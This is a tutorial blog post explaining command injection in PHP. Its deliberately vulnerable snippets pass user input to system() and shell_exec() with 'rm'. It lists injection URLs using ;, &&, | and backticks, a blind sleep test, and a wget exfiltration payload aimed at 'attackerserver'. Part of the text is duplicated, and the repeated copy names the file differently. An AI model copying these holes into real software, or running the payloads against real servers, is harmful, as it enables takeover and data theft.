This vulnerability could lead to various consequences, for example complete takeover of server, stealing sensitive data, launching Denial of service attacks etc. Now lets see an example of command injection vulnerability.
Filename : test.php
<?php
if(empty($_GET['file'])) {
echo "Please give the file name !!";
die();
}
$file = $_GET['file'];
system("wc -c $file");
echo " Bytes";
?>
The above php code will prints the size in bytes of given file name, Note that there are system() function is used to execute system command, and there are a file named data.txt on the web server.Output :
It prints the file size as expected. But at here an attacker could also gives other shell command with the parameter 'file', and due to absence of any kind of security checks on user supplied data, the system() function will execute it. For example :
/test.php?file=data.txt;ls
At above, the data supplied with 'file' parameter are : "data.txt;ls", where ls is list command and ';' (semicolon) is used to indicate end of line, which indicates that there's another separate command after this. Another example :
/test.php?file=data.txt;uname -a
We can also use some other methods like :
'&&' sign : If first command will succeeds then second command run. Example
/test.php?file=data.txt && uname /test.php?file=data.txt | uname /test.php?file=filenotexists || uname /test.php?file=data.txt `uname`Types of Command Injection :
1. Generic Command injection : The output of executed command will return as response. The example above we have seen is generic command injection type.
2. Blind Command Injection : The output of executed command does not returns in response. Now lets see another example to understand Blind Command injection.
Filename : bci.php
<?php
if(empty($_GET['file'])) {
echo "Please give the file name !!";
die();
}
$file = $_GET['file'];
shell_exec("rm $file");
echo "$file is removed.";
?>
The above php code will delete the user supplied file name from the web directory. Also note that, shell_exec() function is used instead of system(), and shell_exec() does not return any output to the response page. Now lets run the above example :
and when we put shell command on the parameter, then it does not show anything related to 'ls' command.
This type of command injection is known as blind command injection, because we did not see the output of executed command on response. In this situation we can use some other commands like 'sleep', which pauses the execution for some second. Example :
and as we can see that webapp is waiting for the server response, means it is vulnerable to command injection attack. In this situation, to exfiltrate data from the sever we can make request from the vulnerable server to our server with the data as parameter. Example :
Note that at above a wrapper "$(command)" is used to execute command on the server.
Conclusion :
This is a very basic introduction to Command Injection Vulnerability. In next post we are going to see some methods and techniques to bypass security checks and sanitization bypass.
Link : Command Injection Part 2 | Bypass Security checks
Visit the link for more tutorials about Web Security : http://www.sec-art.net/p/web-security.html
and when we put shell command on the parameter, then it does not show anything related to 'ls' command.
This type of command injection is known as blind command injection, because we did not see the output of executed command on response. In this situation we can use some other commands like 'sleep', which pauses the execution for some second. Example :
/pci.php?file=data.txt;sleep 10and as we can see that webapp is waiting for the server response, means it is vulnerable to command injection attack. In this situation, to exfiltrate data from the sever we can make request from the vulnerable server to our server with the data as parameter. Example :
/pci.php?file=data.txt;wget http://attackerserver/$(command_to_be_executed)Note that at above a wrapper "$(command)" is used to execute command on the server.
Conclusion :
This is a very basic introduction to Command Injection Vulnerability. In next post we are going to see some methods and techniques to bypass security checks and sanitization bypass.
Link : Command Injection Part 2 | Bypass Security checks
Visit the link for more tutorials about Web Security : http://www.sec-art.net/p/web-security.html